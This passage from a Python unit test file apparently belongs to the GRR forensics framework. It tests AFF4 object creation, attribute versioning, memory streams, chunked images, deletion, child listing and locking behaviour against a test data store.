client.Flush()
# Now create as a different type.
vfsfile = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSFile, mode="w", token=self.token)
vfsfile.Flush()
for diffs_only in [False, True]:
ver_list = list(
aff4.FACTORY.OpenDiscreteVersions(
self.client_id, diffs_only=diffs_only, token=self.token))
self.assertLen(ver_list, 3)
v1, v2, v3 = ver_list
self.assertIsInstance(v1, aff4_grr.VFSGRRClient)
self.assertIsInstance(v2, aff4_grr.VFSGRRClient)
self.assertIsInstance(v3, aff4_grr.VFSFile)
self.assertTrue(
int(v1.Get(v1.Schema.TYPE).age) < int(v2.Get(v2.Schema.TYPE).age))
self.assertTrue(
int(v2.Get(v1.Schema.TYPE).age) < int(v3.Get(v2.Schema.TYPE).age))
self.assertEqual(str(v1.Get(v1.Schema.HOSTNAME)), "client1")
self.assertEqual(str(v2.Get(v2.Schema.HOSTNAME)), "client2")
self.assertFalse(v3.Schema.HOSTNAME)
def _CheckAFF4AttributeDefaults(self, client):
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(
client.Get(client.Schema.DOESNOTEXIST, "mydefault"), "mydefault")
self.assertEqual(
client.Get(client.Schema.DOESNOTEXIST, default="mydefault"),
"mydefault")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST, None), None)
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST, default=None), None)
def testGetBadAttribute(self):
"""Test checking of non-existent attributes."""
# Check behaviour when we specify a type
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
# This should raise since we specified an aff4_type in Create
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from the existing object code path in create
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from Open
client = aff4.FACTORY.Open(
self.client_id, aff4_grr.VFSGRRClient, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from MultiOpen
clients = aff4.FACTORY.MultiOpen([self.client_id],
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token)
for client in clients:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Make sure we don't raise if no type specified. No need to check create,
# since a type must always be specified.
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST), None)
# Check we get the same result from MultiOpen
clients = aff4.FACTORY.MultiOpen([self.client_id],
mode="rw",
token=self.token)
for client in clients:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST), None)
def testAppendAttribute(self):
"""Test that append attribute works."""
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
obj.Set(obj.Schema.STORED("www.google.com"))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="rw", token=self.token, age=aff4.ALL_TIMES)
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 1)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
# There should be 6 there now
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 6)
obj.Close()
# Check that when read back from the data_store we stored them all
obj = aff4.FACTORY.Open("foobar", token=self.token, age=aff4.ALL_TIMES)
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 6)
def testLastAddedAttributeWinsWhenTimestampsAreEqual(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Create(
"foobar", aff4.AFF4Object, token=self.token) as obj:
obj.Set(obj.Schema.STORED("foo"))
obj.Set(obj.Schema.STORED("bar"))
obj = aff4.FACTORY.Open("foobar", token=self.token)
self.assertEqual(obj.Get(obj.Schema.STORED), "bar")
def testFlushNewestTime(self):
"""Flush with age policy NEWEST_TIME should only keep a single version."""
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
obj.Set(obj.Schema.STORED("www.google.com"))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="rw", token=self.token, age=aff4.NEWEST_TIME)
self.assertLen(obj.synced_attributes[obj.Schema.STORED.predicate], 1)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
# There should be 5 unsynced versions now
self.assertLen(obj.new_attributes[obj.Schema.STORED.predicate], 5)
obj.Flush()
# When we sync there should be no more unsynced attributes.
self.assertEqual({}, obj.new_attributes)
# But there should only be a single synced attribute since this object has a
# NEWEST_TIME age policy.
self.assertLen(obj.synced_attributes[obj.Schema.STORED.predicate], 1)
# The latest version should be kept.
self.assertEqual(obj.Get(obj.Schema.STORED), "example.com/4")
def testCopyAttributes(self):
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="r", token=self.token, age=aff4.ALL_TIMES)
# There should be 5 attributes now
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 5)
new_obj = aff4.FACTORY.Create(
"new_foobar", aff4.AFF4Object, token=self.token)
new_obj.Copy(new_obj.Schema.STORED, obj, obj.Schema.STORED)
new_obj.Close()
new_obj = aff4.FACTORY.Open(
"new_foobar", mode="r", token=self.token, age=aff4.ALL_TIMES)
# Check that attribute got copied properly
self.assertListEqual(
list(obj.GetValuesForAttribute(obj.Schema.STORED)),
list(new_obj.GetValuesForAttribute(obj.Schema.STORED)))
def testAttributeSet(self):
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
self.assertFalse(obj.IsAttributeSet(obj.Schema.STORED))
obj.Set(obj.Schema.STORED("www.google.com"))
self.assertTrue(obj.IsAttributeSet(obj.Schema.STORED))
obj.Close()
obj = aff4.FACTORY.Open("foobar", token=self.token)
self.assertTrue(obj.IsAttributeSet(obj.Schema.STORED))
def testCreateObject(self):
"""Test that we can create a new object."""
path = "/C.0123456789abcdef/foo/bar/hello.txt"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
fd.Flush()
# Now object is ready for use
fd.Write(b"hello")
fd.Close()
fd = aff4.FACTORY.Open(path, token=self.token)
self.assertEqual(fd.Read(100), b"hello")
# Make sure that we have intermediate objects created.
for path in [
"aff4:/C.0123456789abcdef", "aff4:/C.0123456789abcdef/foo",
"aff4:/C.0123456789abcdef/foo/bar",
"aff4:/C.0123456789abcdef/foo/bar/hello.txt"
]:
fd = aff4.FACTORY.Open(path, token=self.token)
last = fd.Get(fd.Schema.LAST)
self.assertGreater(int(last), 1330354592221974)
def testCreateWithPool(self):
"""Tests that we can create aff4 objects using a pool."""
path1 = "aff4:/test/pool_memory_stream"
path2 = "aff4:/test/pool_memory_stream2"
pool = data_store.DB.GetMutationPool()
for path in [path1, path2]:
fd = aff4.FACTORY.Create(
path,
aff4.AFF4UnversionedMemoryStream,
mode="w",
mutation_pool=pool,
token=self.token)
content = b"TestData" * 10
fd.Write(content)
fd.Close()
# Make sure nothing has been written to the paths we use.
if isinstance(data_store.DB, fake_data_store.FakeDataStore):
# Stronger test that uses fake data store internals.
self.assertIn(path1, path2) # Just so we don't miss anything.
for subject in data_store.DB.subjects:
self.assertNotIn(path1, subject)
else:
self.assertFalse(data_store.DB.ResolveRow(path1))
self.assertFalse(data_store.DB.ResolveRow(path2))
pool.Flush()
self.assertTrue(data_store.DB.ResolveRow(path1))
self.assertTrue(data_store.DB.ResolveRow(path2))
fd = aff4.FACTORY.Open(path1, token=self.token)
self.assertEqual(fd.read(100), content)
def testObjectUpgrade(self):
"""Test that we can create a new object of a different type."""
path = "C.0123456789abcdef"
# Write the first object
with aff4.FACTORY.Create(
path, aff4_grr.VFSGRRClient, token=self.token) as fd:
fd.Set(fd.Schema.HOSTNAME("blah"))
original_fd = fd
# Check it got created
with aff4.FACTORY.Open(path, aff4_grr.VFSGRRClient, token=self.token) as fd:
self.assertEqual(fd.Get(fd.Schema.HOSTNAME), "blah")
self.assertEqual(fd.Get(fd.Schema.TYPE), "VFSGRRClient")
# Overwrite with a new object of different type
with aff4.FACTORY.Create(
path, aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"hello")
# Check that the object is now an AFF4MemoryStream
with aff4.FACTORY.Open(path, aff4.AFF4MemoryStream, token=self.token) as fd:
self.assertEqual(fd.Read(100), b"hello")
self.assertEqual(fd.Get(fd.Schema.TYPE), "AFF4MemoryStream")
self.assertRaises(aff4.BadGetAttributeError, getattr, fd.Schema,
"HOSTNAME")
# Attributes of previous objects are actually still accessible. Some code
# relies on this behaviour so we verify it here.
with aff4.FACTORY.Open(path, token=self.token) as fd:
self.assertEqual(fd.Read(100), b"hello")
self.assertEqual(fd.Get(original_fd.Schema.HOSTNAME), "blah")
def testDelete(self):
"""Check that deleting the object works."""
path = "/C.0123456789abcdef/foo/bar/hello.txt"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
fd.Write(b"hello")
fd.Close()
# Delete the directory and check that the file in it is also removed.
aff4.FACTORY.Delete(os.path.dirname(path), token=self.token)
self.assertRaises(
IOError,
aff4.FACTORY.Open,
path,
aff4.AFF4MemoryStream,
token=self.token)
def testDeleteRaisesWhenTryingToDeleteRoot(self):
self.assertRaises(
ValueError, aff4.FACTORY.Delete, "aff4:/", token=self.token)
def testRecursiveDelete(self):
"""Checks that recusrive deletion of objects works."""
paths_to_delete = [
"aff4:/tmp/dir1/hello1.txt", "aff4:/tmp/dir1/foo/hello2.txt",
"aff4:/tmp/dir1/foo/bar/hello3.txt"
]
safe_paths = ["aff4:/tmp/dir2/hello4.txt"]
for path in paths_to_delete + safe_paths:
with aff4.FACTORY.Create(
path, aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"hello")
fd = aff4.FACTORY.Open("aff4:/tmp", token=self.token)
self.assertListEqual(
sorted(fd.ListChildren()), ["aff4:/tmp/dir1", "aff4:/tmp/dir2"])
aff4.FACTORY.Delete("aff4:/tmp/dir1", token=self.token)
for path in paths_to_delete:
self.assertRaises(
IOError,
aff4.FACTORY.Open,
path,
aff4.AFF4MemoryStream,
token=self.token)
fd = aff4.FACTORY.Open(os.path.dirname(path), token=self.token)
self.assertFalse(list(fd.ListChildren()))
fd = aff4.FACTORY.Open("aff4:/tmp", token=self.token)
self.assertListEqual(list(fd.ListChildren()), ["aff4:/tmp/dir2"])
fd = aff4.FACTORY.Open("aff4:/tmp/dir2", token=self.token)
self.assertListEqual(list(fd.ListChildren()), ["aff4:/tmp/dir2/hello4.txt"])
def testMultiDeleteRaisesWhenTryingToDeleteRoot(self):
self.assertRaises(
ValueError,
aff4.FACTORY.MultiDelete, ["aff4:/a", "aff4:/"],
token=self.token)
def testMultiDeleteRemovesAllTracesOfObjectsFromDataStore(self):
unique_token = "recursive_delete"
subjects = []
for i in range(5):
for j in range(5):
subjects.append("aff4:" + ("/%s%d" % (unique_token, i)) * (j + 1))
for subject in subjects:
with aff4.FACTORY.Create(subject, aff4.AFF4Volume, token=self.token):
pass
aff4.FACTORY.MultiDelete(
["aff4:/%s%d" % (unique_token, i) for i in range(5)], token=self.token)
if isinstance(data_store.DB, fake_data_store.FakeDataStore):
for subject, subject_data in iteritems(data_store.DB.subjects):
self.assertNotIn(unique_token, subject)
for column_name, values in iteritems(subject_data):
self.assertNotIn(unique_token, column_name)
for value, _ in values:
self.assertNotIn(unique_token, utils.SmartUnicode(value))
else:
for subject in subjects:
self.assertFalse(data_store.DB.ResolveRow(subject))
def testClientObject(self):
fd = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, token=self.token)
# Certs invalid - The RDFX509Cert should check the validity of the cert
self.assertRaises(rdfvalue.DecodeError,
rdf_crypto.RDFX509Cert.FromSerializedString, "My cert")
fd.Close()
def testAFF4MemoryStream(self):
"""Tests the AFF4MemoryStream."""
path = "/C.12345/memorystreamtest"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
self.assertEqual(fd.size, 0)
self.assertEqual(fd.Tell(), 0)
size = 0
for i in range(100):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
self.assertEqual(fd.Tell(), size)
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
self.assertEqual(fd.Tell(), 0)
fd.Seek(size)
self.assertEqual(fd.Tell(), size)
fd.Seek(100)
fd.Write(b"Hello World!")
self.assertEqual(fd.size, size)
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
data = fd.Read(size)
self.assertLen(data, size)
self.assertTrue(b"Hello World!" in data)
fd.Close()
def ExerciseAFF4ImageBase(self, classname):
"""Run basic tests on a subclass of AFF4ImageBase."""
path = "/C.12345/aff4image"
with aff4.FACTORY.Create(path, classname, token=self.token) as fd:
fd.SetChunksize(10)
# Make lots of small writes. The length of this string and the chunk size
# are relatively prime, to exercise the worst case.
for i in range(10):
fd.Write(b"Test%08X\n" % i)
with aff4.FACTORY.Open(path, token=self.token) as fd:
for i in range(10):
self.assertEqual(fd.Read(13), b"Test%08X\n" % i)
with aff4.FACTORY.Create(
path, classname, mode="rw", token=self.token) as fd:
fd.Set(fd.Schema._CHUNKSIZE(10))
# Overflow the cache (Cache is 100 chunks, can hold 10*100 bytes).
fd.Write(b"X" * 1100)
self.assertEqual(fd.size, 1100)
# Now rewind a bit and write something.
fd.seek(fd.size - 100)
fd.Write(b"Hello World")
self.assertEqual(fd.size, 1100)
# Now append to the end.
fd.seek(fd.size)
fd.Write(b"Y" * 10)
self.assertEqual(fd.size, 1110)
# And verify everything worked as expected.
fd.seek(997)
data = fd.Read(17)
self.assertEqual(b"XXXHello WorldXXX", data)
fd.seek(1097)
data = fd.Read(6)
self.assertEqual(b"XXXYYY", data)
# Set max_unbound_read_size to the final size of the object at this path
# before re-creating it, for the unbound read() tests.
with test_lib.ConfigOverrider({"Server.max_unbound_read_size": 1110}):
with aff4.FACTORY.Create(
path, classname, mode="rw", token=self.token) as fd:
fd.Set(fd.Schema._CHUNKSIZE(10))
# Verify that the unbound read returns all 1110 bytes
data = fd.read()
self.assertLen(data, 1110)
# Append additional data and retry as oversized unbound read
fd.seek(fd.size)
fd.Write(b"X" * 10)
fd.seek(0)
self.assertRaises(aff4.OversizedRead, fd.read)
def testAFF4Image(self):
self.ExerciseAFF4ImageBase(aff4.AFF4Image)
def testAFF4UnversionedImage(self):
self.ExerciseAFF4ImageBase(aff4.AFF4UnversionedImage)
def testAFF4ImageSize(self):
path = "/C.12345/aff4imagesize"
fd = aff4.FACTORY.Create(path, aff4.AFF4Image, token=self.token)
fd.SetChunksize(10)
size = 0
for i in range(99):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
# Now append some more data.
fd.seek(fd.size)
for i in range(99):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
fd.Close()
# Writes in the middle should not change size.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
fd.Seek(100)
fd.Write(b"Hello World!")
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
data = fd.Read(fd.size)
self.assertLen(data, size)
self.assertTrue(b"Hello World!" in data)
fd.Close()
def testAFF4ImageWithFlush(self):
"""Make sure the AFF4Image can survive with partial flushes."""
path = "/C.12345/foo"
self.WriteImage(path, b"Test")
fd = aff4.FACTORY.Open(path, token=self.token)
for i in range(100):
self.assertEqual(fd.Read(13), b"Test%08X\n" % i)
def WriteImage(self,
path,
prefix=b"Test",
timestamp=0,
classname=aff4.AFF4Image):
with utils.Stubber(time, "time", lambda: timestamp):
fd = aff4.FACTORY.Create(path, classname, mode="w", token=self.token)
timestamp += 1
fd.SetChunksize(10)
# Make lots of small writes. The length of this string and the chunk size
# are relatively prime, to exercise the worst case.
for i in range(100):
fd.Write(b"%s%08X\n" % (prefix, i))
# Flush after every write.
fd.Flush()
# And advance the time.
timestamp += 1
fd.Close()
def testAFF4ImageWithVersioning(self):
"""Make sure the AFF4Image can do multiple versions."""
path = "/C.12345/foowithtime"
self.WriteImage(path, b"Time1", timestamp=1000)
# Write a newer version.
self.WriteImage(path, b"Time2", timestamp=2000)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 1150 * 1e6))
for i in range(100):
s = b"Time1%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 2250 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
def testAFF4ImageWithoutVersioning(self):
"""Make sure the AFF4UnversionedImage does not do multiple versions."""
path = "/C.12345/foowithtime"
self.WriteImage(
path, b"Time1", timestamp=1000, classname=aff4.AFF4UnversionedImage)
# Write a newer version.
self.WriteImage(
path, b"Time2", timestamp=2000, classname=aff4.AFF4UnversionedImage)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 1150 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 2250 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
def testAFF4ImageContentLastUpdated(self):
"""Make sure CONTENT_LAST gets updated only when content is written."""
path = "/C.12345/contentlastchecker"
self.WriteImage(path, timestamp=1)
fd = aff4.FACTORY.Open(path, token=self.token)
# Make sure the attribute was written when the write occurred.
self.assertEqual(int(fd.GetContentAge()), 101000000)
# Write the image again, later in time.
self.WriteImage(path, timestamp=2)
fd = aff4.FACTORY.Open(path, token=self.token)
self.assertEqual(int(fd.GetContentAge()), 102000000)
def testAFF4FlowObject(self):
"""Test the AFF4 Flow object."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, token=self.token)
client.Close()
# Start some new flows on it
session_ids = []
for _ in range(10):
session_ids.append(
flow.StartAFF4Flow(
client_id=self.client_id,
flow_name=flow_test_lib.FlowOrderTest.__name__,
token=self.token))
# Try to open a single flow.
flow_obj = aff4.FACTORY.Open(session_ids[0], mode="r", token=self.token)
self.assertEqual(flow_obj.runner_args.flow_name,
flow_test_lib.FlowOrderTest.__name__)
self.assertEqual(flow_obj.session_id, session_ids[0])
self.assertEqual(flow_obj.__class__.__name__,
flow_test_lib.FlowOrderTest.__name__)
def testMultiOpen(self):
root_urn = aff4.ROOT_URN.Add("path")
f = aff4.FACTORY.Create(
root_urn.Add("some1"), aff4.AFF4Volume, token=self.token)
f.Close()
f = aff4.FACTORY.Create(
root_urn.Add("some2"), aff4.AFF4Volume, token=self.token)
f.Close()
root = aff4.FACTORY.Open(root_urn, token=self.token)
all_children = list(aff4.FACTORY.MultiOpen(root.ListChildren()))
self.assertListEqual(
sorted([x.urn for x in all_children]),
[root_urn.Add("some1"), root_urn.Add("some2")])
def testMultiOpenOrdered(self):
foo_urn = aff4.ROOT_URN.Add("foo")
with aff4.FACTORY.Create(
foo_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"FOO")
bar_urn = aff4.ROOT_URN.Add("bar")
with aff4.FACTORY.Create(
bar_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"BAR")
baz_urn = aff4.ROOT_URN.Add("baz")
with aff4.FACTORY.Create(
baz_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"BAZ")
filedescs = list(aff4.FACTORY.MultiOpenOrdered([foo_urn, bar_urn, baz_urn]))
self.assertLen(filedescs, 3)
self.assertEqual(filedescs[0].Read(1337), b"FOO")
self.assertEqual(filedescs[1].Read(1337), b"BAR")
self.assertEqual(filedescs[2].Read(1337), b"BAZ")
def testMultiOpenOrderedNonExistingObject(self):
foo_urn = aff4.ROOT_URN.Add("foo")
bar_urn = aff4.ROOT_URN.Add("bar")
with aff4.FACTORY.Create(
foo_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
del filedesc # Unused.
with self.assertRaisesRegexp(IOError, "bar"):
aff4.FACTORY.MultiOpenOrdered([foo_urn, bar_urn], token=self.token)
def testObjectListChildren(self):
root_urn = aff4.ROOT_URN.Add("path")
f = aff4.FACTORY.Create(
root_urn.Add("some1"), aff4.AFF4Volume, token=self.token)
f.Close()
f = aff4.FACTORY.Create(
root_urn.Add("some2"), aff4.AFF4Volume, token=self.token)
f.Close()
root = aff4.FACTORY.Open(root_urn, token=self.token)
all_children = sorted(list(root.ListChildren()))
self.assertListEqual(
sorted(all_children),
[root_urn.Add("some1"), root_urn.Add("some2")])
def testMultiListChildren(self):
client1_urn = rdfvalue.RDFURN("C.%016X" % 0)
client2_urn = rdfvalue.RDFURN("C.%016X" % 1)
with aff4.FACTORY.Create(
client1_urn.Add("some1"), aff4.AFF4Volume, token=self.token):
pass
with aff4.FACTORY.Create(
client2_urn.Add("some2"), aff4.AFF4Volume, token=self.token):
pass
children = dict(aff4.FACTORY.MultiListChildren([client1_urn, client2_urn]))
self.assertListEqual(sorted(iterkeys(children)), [client1_urn, client2_urn])
self.assertListEqual(children[client1_urn], [client1_urn.Add("some1")])
self.assertListEqual(children[client2_urn], [client2_urn.Add("some2")])
def testFactoryListChildren(self):
client_urn = rdfvalue.RDFURN("C.%016X" % 0)
with aff4.FACTORY.Create(
client_urn.Add("some1"), aff4.AFF4Volume, token=self.token):
pass
with aff4.FACTORY.Create(
client_urn.Add("some2"), aff4.AFF4Volume, token=self.token):
pass
children = aff4.FACTORY.ListChildren(client_urn)
self.assertListEqual(
sorted(children), [client_urn.Add("some1"),
client_urn.Add("some2")])
def testIndexNotUpdatedWhenWrittenWithinIntermediateCacheAge(self):
with utils.Stubber(time, "time", lambda: 100):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child1"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
latest_time = 100 + aff4.FACTORY.intermediate_cache_age - 1
with utils.Stubber(time, "time", lambda: latest_time):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child2"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
def testIndexUpdatedWhenWrittenAfterIntemediateCacheAge(self):
with utils.Stubber(time, "time", lambda: 100):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child1"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
latest_time = 100 + aff4.FACTORY.intermediate_cache_age + 1
with utils.Stubber(time, "time", lambda: latest_time):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child2"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(latest_time))
def testClose(self):
"""Ensure that closed objects can not be used again."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Close()
self.assertRaises(IOError, client.Get, client.Schema.HOSTNAME)
self.assertRaises(IOError, client.Set, client.Schema.HOSTNAME("hello"))
def testVersionOrder(self):
"""Test that GetValuesForAttribute returns versions in the right order."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("Host1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("Host2"))
client.Flush()
# Get() returns the most recent version.
self.assertEqual(client.Get(client.Schema.HOSTNAME), "Host2")
client = aff4.FACTORY.Open(
self.client_id, token=self.token, age=aff4.ALL_TIMES)
# Versioned attributes must be returned in most recent order first.
self.assertEqual(
list(client.GetValuesForAttribute(client.Schema.HOSTNAME)),
["Host2", "Host1"])
# Get() returns the most recent version.
self.assertEqual(client.Get(client.Schema.HOSTNAME), "Host2")
def testAsynchronousOpenWithLockWorksCorrectly(self):
self.client_id = rdfvalue.RDFURN(self.client_id)
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
# This should raise, because obj1 is holding the lock
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise now, as previous Close() call has released the lock.
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
def testAsynchronousCreateWithLock(self):
self.client_id = rdfvalue.RDFURN(self.client_id)
with aff4.FACTORY.CreateWithLock(
self.client_id, aff4_grr.VFSGRRClient, token=self.token) as obj:
obj.Set(obj.Schema.HOSTNAME("client1"))
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
# This should raise, because obj is still holding the lock
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise now, as previous Close() call has released the lock.
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False) as obj:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj.Get(obj.Schema.HOSTNAME), "client1")
def testSynchronousOpenWithLockWorksCorrectly(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
t_state = {
"parallel_thread_got_lock": False,
"parallel_thread_raised": False
}
def ParallelThread():
try:
# Using blocking_lock_timeout of 10 minutes to avoid possible
# timeouts when running tests on slow hardware.
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_sleep_interval=0,
blocking_lock_timeout=600):
pass
t_state["parallel_thread_got_lock"] = True
except Exception: # pylint: disable=broad-except
# Catching all the exceptions, because exceptions raised in threads
# do not cause the test to fail - threads just die silently.
t_state["parallel_thread_raised"] = True
t = threading.Thread(target=ParallelThread)
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
t.start()
time.sleep(0.1)
# At this point, the thread should be attempting to get the lock.
self.assertFalse(t_state["parallel_thread_got_lock"])
self.assertFalse(t_state["parallel_thread_raised"])
# We released the lock, so now the thread should finally get it,
# release it, and die.
t.join()
self.assertTrue(t_state["parallel_thread_got_lock"])
self.assertFalse(t_state["parallel_thread_raised"])
def testSynchronousOpenWithLockTimesOutCorrectly(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_lock_timeout=0.1,
blocking_sleep_interval=0.1):
pass
self.assertRaises(aff4.LockError, TryOpen)
def testLockHasLimitedLeaseTime(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with self.assertRaises(aff4.LockError):
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
time.time = lambda: 150
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise, because previous lock's lease has expired
time.time = lambda: 201
TryOpen()
self.assertRaises(aff4.LockError, fd.Close)
self.assertRaises(aff4.LockError, fd.Flush)
